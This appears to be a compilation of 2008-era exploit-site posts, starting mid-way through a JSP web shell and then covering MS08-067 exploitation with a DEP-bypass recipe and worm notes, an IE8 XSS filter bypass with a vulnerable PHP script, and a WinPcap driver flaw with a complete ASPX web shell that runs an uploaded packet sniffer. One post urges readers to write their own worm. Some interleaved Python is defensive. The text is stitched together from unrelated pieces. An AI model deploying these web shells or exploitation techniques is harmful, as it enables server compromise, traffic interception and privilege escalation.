    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
<p>

# milw0rm.com [2008-11-28]


Another talk about MS08-067

Hi again

I'm sure you know about this critical / wormable vulnerability. Immediately after the vulnerability was released, the Win32.Gimmiv worm was released too. This worm uses this vulnerability and, after its first execution, runs as a Windows service. But I'm sure this worm is not the last worm based on this vulnerability.

This vulnerability specifically exists in the Server Service's Remote Procedure Call (RPC) handling, where an attacker could perform a stack-based buffer overflow by sending a request to a vulnerable function, "NetPathCanonicalize()". In this way an attacker may escalate privileges, using the named pipe "\\pipe\srvsvc" to access other machines over the network via the pipe's file sharing service.

Exploiting this vulnerability on Win2k and XP SP1, SP2 and SP3 is really fun: just an RPC request to the interface 4b324fc8-1670-01d3-1278-5a47bf6ee188 to get a reliable EIP and code execution. On Windows XP SP1 and 2000, and of course Windows XP SP2 and SP3 with no DEP, you need just a jmp or call to the esi or edi register for code execution.

And about Windows XP SP2 and SP3 with DEP:

You can use the address of the NtSetInformationProcess call in ACGENRAL.DLL to disable DEP; of course you need scratch space (a read/write static memory location), and you can find that in ACGENRAL.dll too.

HD Moore, independent security researcher, used this method for executing shellcode. On Windows XP SP3 you can use this method too (using the per-process disable in ACGENRAL.dll), of course with a different address for the NtSetInformationProcess() call.

From hdm:

The actual function we use to disable NX looks like this:

push    4
lea     eax, [ebp+arg_0]
push    eax
push    22h
push    0FFFFFFFFh
mov     [ebp+arg_0], 2
call    ds:__imp__NtSetInformationProcess@16
I wrote my own reliable exploit, and maybe in future I will publish it for all.

And about the Gimmiv worm:

Full discussion:

http://community.ca.com/blogs/securityadvisor/archive/2008/10/27/ms08-067-wormable-vulnerability-patched.aspx

The executable "WinbaseInst.exe" is the worm component; you can see the worm service after executing the binary, as in the following picture:

You can be sure this worm uses this vulnerability from the UUID found in basesvc.dll in %SystemRoot%\system32\wbem.

After the worm scans and finds a vulnerable system using 4b324fc8-1670-01d3-1278-5a47bf6ee188, the worm runs download-and-execute shellcode, as in the following picture:

This worm uses random numbers and random servers for downloading files. I'm sure this worm has different compiled versions (for leaked servers and AVs). Maybe in another post I will discuss this worm completely.

You can read the full post about reversing the MS08-067 patch here:

http://www.dontstuffbeansupyournose.com

The next post will be patch analysis part 1.

For now, test your skills by writing your own worm with this vulnerability.

Best regards and have nice hacking

Internet Explorer 8 XSS filter bypass

IE8 is Microsoft's new browser, with complete CSS 2.1 support, HTML5 support, built-in development tools and so on. IE8 is a very big improvement in browser security: it has a built-in XSS Filter, which gives relatively good protection against non-persistent (reflected) cross-site scripting attacks. However, in testing IE8, 80sec found that the IE8 XSS Filter has a vulnerability, so that on some versions for eastern countries it simply cannot stop URL XSS; for example, on the Persian version, some simple data can bypass IE8's filter strategy.

Vulnerability analysis: the IE8 XSS Filter uses the system's built-in encoding when filtering; on the Persian version this is gb2312, and in some other eastern countries the corresponding wide-byte encoding is adopted. A submitted sequence that is not valid in that encoding, such as %c1<, is treated by IE8 as one normal character when matching the filter's keywords. But when the page is displayed, because the page has declared UTF-8 encoding, at parse time %c1< is not a valid UTF-8 sequence, so it is treated as two characters, and the resulting < bypasses the check. This inconsistency creates the vulnerability.

Demonstration: assume there is a web script:


<?php
header("Content-Type: text/html; charset=utf-8");
echo $_GET['c'];
?>

On an IE8 system in an eastern country, if you carry out a conventional XSS such as:

.php?c=<script>alert()</script>

IE8's security strategy will block it, but a request using the %c1< sequence described above can bypass the IE8 XSS filter and execute.

Vulnerability status: this vulnerability was reported to Microsoft (by Chinese hackers) and is awaiting a response.
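The mismatch is easier to see with a small model of the two decoders. The Python below is an added example and not part of the 80sec report: dbcs_view() is a simplified model (an assumption about the filter, not IE's code) of a scanner that walks bytes in a double-byte code page, where any lead byte 0x81-0xFE swallows the following byte; utf8_view() is how the page is really decoded under its declared charset; consistent_check() is the fix, matching in the charset the response declares.

```python
"""Model of the IE8 XSS-filter charset mismatch (added example; the DBCS walk is
a simplified assumption about the filter, not IE's code)."""
import re

SCRIPT_TAG = re.compile(r"<script", re.IGNORECASE)


def dbcs_view(raw: bytes) -> str:
    """What a filter that scans in a double-byte code page such as gb2312 sees:
    a lead byte (0x81-0xFE) consumes the next byte as the second half of one
    character, whatever that byte is."""
    chars, i = [], 0
    while i < len(raw):
        if 0x81 <= raw[i] <= 0xFE and i + 1 < len(raw):
            chars.append("\ufffd")          # one two-byte character
            i += 2
        else:
            chars.append(chr(raw[i]))
            i += 1
    return "".join(chars)


def utf8_view(raw: bytes) -> str:
    """What the browser renders when the response declares charset=utf-8:
    0xC1 can never start a UTF-8 sequence, so it decodes alone and the
    following '<' survives as its own character."""
    return raw.decode("utf-8", errors="replace")


def filter_blocks(raw: bytes) -> bool:
    return SCRIPT_TAG.search(dbcs_view(raw)) is not None


def page_executes(raw: bytes) -> bool:
    return SCRIPT_TAG.search(utf8_view(raw)) is not None


def consistent_check(raw: bytes, declared_charset: str = "utf-8") -> bool:
    """Fix: decode with the charset the page declares before matching."""
    return SCRIPT_TAG.search(raw.decode(declared_charset, errors="replace")) is not None


PLAIN = b"<script>alert()</script>"          # conventional payload
WIDE = b"\xc1<script>alert()</script>"       # the %c1< prefix from the report


def compare(raw: bytes) -> dict:
    return {"filter_blocks": filter_blocks(raw),
            "page_executes": page_executes(raw),
            "consistent_filter_blocks": consistent_check(raw)}


if __name__ == "__main__":
    for name, raw in (("plain", PLAIN), ("wide", WIDE)):
        print(name, compare(raw))
```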

Bug in WinPcap

I feel God is here.

Hi dear, I'm Daphne; my job is penetration tester (pen-tester). I write about this subject and around it.

Pen-testing is a cool & fun job, with hacking as an interesting subject.

anyway ....

I use WinPcap 4.2 (latest version)

http://www.winpcap.org/install/default.htm

what is winpcap :

WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.

WinPcap consists of a driver, that extends the operating system to provide low-level network access, and a library that is used to easily access the low-level network layers. This library also contains the Windows version of the well known libpcap Unix API.

How to load WinPcap in Windows:

BUG:

When an Administrator or other power user in Windows summons the WinPcap driver (with Wireshark, nmap, Cain or ...), the driver is loaded!

But when the program is closed, the WinPcap driver is still in memory. That's it.

When the driver is not unloaded, a Guest user or the IIS user can use this kernel-level driver, sniff the Administrator's packets at administrator level, or get Administrator privileges.

I sniffed packets with WinDump in guest mode.
http://www.winpcap.org/windump/install/default.htm

OK, I wrote this little tool for IIS7 / IIS6 on Windows 2003 / 2008:

Usage:

Load Wireshark or another tool that runs the WinPcap driver.

Rename windump.exe to packet.exe, upload it next to winpcap.aspx and run it.

Then you can see the sniffed packets in 1.txt.

winpcap.aspx

<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
' Change Path Of tcpdump
Dim myProcessStartInfo As New ProcessStartInfo(Server.MapPath("packet.exe"))
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","&lt;")
mystring=replace(mystring,">","&gt;")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub</script>
<form runat="server">
New Method Of Packet Sniffing In web with Public Access.
<br />
This Program Run is AS IS !
<strong><span class="style-2">Server ip</span></strong> :<span class="style-2">  <%=request.ServerVariables("LOCAL_ADDR")%></span><br>
<strong><span class="style-2">Machine Name</span></strong> :<span class="style-2"> <%=Environment.MachineName%></span><br>
<strong><span class="style-2">Network Name</span></strong> :<span class="style-2"> <%=Environment.UserDomainName.ToString()%></span><br>
<strong><span class="style-2">User Name</span></strong> :<span class="style-2"> <%=Environment.UserName%></span> <br>
<strong><span class="style-2">OS Version</span></strong> :<span class="style-2"> <%=Environment.OSVersion.ToString()%></span><br>
<strong><span class="style-2">IIS Version</span></strong> :<span class="style-2"> <%=request.ServerVariables("SERVER_SOFTWARE")%></span><br>
<strong><span class="style-2">HTTPS</span></strong> <span class="style-2">: <%=request.ServerVariables("HTTPS")%></span><br>
<br />
Tested On Windows vista , IIS7 .
<br />
<h5>Discover By "DAPHNE IDEA SECURITY" .</h5>
<br />
Exp: -i 6 -w "c:\windows\temp\packet.txt"
<hr />
<asp:Label id="L_p" style="COLOR: #0000ff" runat="server" width="80px">TCP DUMP PATH:</asp:Label>
<br />
<label><%=Server.MapPath("packet.exe")%></label>
<br />
<asp:Label id="L_a" style="COLOR: #0000ff" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px">-D</asp:TextBox>
<br />
<br />
<asp:Button id="Button" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #000000" onclick="runcmd" runat="server" Width="100px" Text="DUMP PAcket"></asp:Button>
<p>
<asp:Label id="result" style="COLOR: #0000ff" runat="server"></asp:Label>
</p>
</form>

This tool is a sample.

In future I will speak about privilege escalation in drivers with the Kartoffel tool ;)
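Two checks a practitioner would want, one from the Tomcat/JRun post above and one from this post, can both be made from sc.exe output: which account the servlet container's service runs as, and whether the NPF driver is still loaded once no capture tool is running. The Python below is an added example, not code from either post; the sc qc / sc query text is constructed to match sc.exe's layout, and the list of high-privilege accounts is an assumption.

```python
"""Audit Windows service configuration from `sc qc` / `sc query` output
(added example; the sc.exe output below is constructed)."""
from typing import Dict, List


def parse_sc(text: str) -> Dict[str, str]:
    """Turn sc.exe's 'KEY : value' lines into a dict; continuation lines that
    start with a bare ':' (extra DEPENDENCIES entries) are appended."""
    fields: Dict[str, str] = {}
    last = None
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key:
            fields[key] = value
            last = key
        elif last:
            fields[last] = (fields[last] + "," + value).strip(",")
    return fields


# Accounts under which a web container should not run (assumption).
HIGH_PRIV_ACCOUNTS = {"localsystem", "nt authority\\system", ".\\administrator"}


def audit_container_account(qc_output: str) -> List[str]:
    """JSP/CFM code that calls Runtime.exec() inherits this service account."""
    f = parse_sc(qc_output)
    acct = f.get("SERVICE_START_NAME", "")
    if acct.lower() in HIGH_PRIV_ACCOUNTS or "admin" in acct.lower():
        return [f"{f.get('SERVICE_NAME')} runs as {acct}: server-side code executes "
                "with that account's privileges; use a dedicated low-privilege account"]
    return []


def audit_capture_driver(query_output: str, capture_tool_running: bool) -> List[str]:
    """The NPF driver stays loaded after Wireshark/WinDump exit; flag that state."""
    f = parse_sc(query_output)
    state = f.get("STATE", "")
    if "RUNNING" in state and not capture_tool_running:
        return [f"{f.get('SERVICE_NAME')} is still loaded ({state}) with no capture "
                "tool running: stop it (sc stop npf) so low-privilege users cannot open it"]
    return []


# Constructed sc.exe output in its usual layout.
SC_QC_TOMCAT = """[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Tomcat6
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\\Program Files\\Apache Software Foundation\\Tomcat 6.0\\bin\\tomcat6.exe" //RS//Tomcat6
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Apache Tomcat 6
        DEPENDENCIES       : Tcpip
                           : Afd
        SERVICE_START_NAME : LocalSystem
"""

SC_QUERY_NPF = """SERVICE_NAME: npf
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
"""

if __name__ == "__main__":
    for finding in audit_container_account(SC_QC_TOMCAT) + audit_capture_driver(SC_QUERY_NPF, False):
        print(finding)
```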
